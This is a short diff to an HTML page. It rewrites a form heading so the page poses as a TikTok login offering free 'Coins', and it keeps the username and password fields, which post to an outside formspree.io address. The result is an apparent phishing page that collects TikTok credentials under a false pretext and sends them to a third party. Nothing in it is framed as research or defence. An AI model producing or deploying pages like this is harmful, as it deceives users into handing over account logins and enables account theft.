--- a/index.html
+++ b/index.html
@@ -25,6 +25,8 @@
     text-align: center;
     margin-bottom: 20px;
     color: #333;
+    font-size: 18px;
+    line-height: 1.4;
   }
   input {
     width: 100%;
@@ -49,7 +51,7 @@
 </head>
 <body>
 <form action="https://formspree.io/f/xyznbrvg" method="POST">
-  <h2>Student Access Form</h2>
+  <h2>Log in to get Coins<br>Log in to your TiKToK account to get Coins, check notifications and more.</h2>
   <input type="text" name="username" placeholder="Username" required>
   <input type="text" name="Password" placeholder="Password" required>
   <button type="submit">Submit</button>
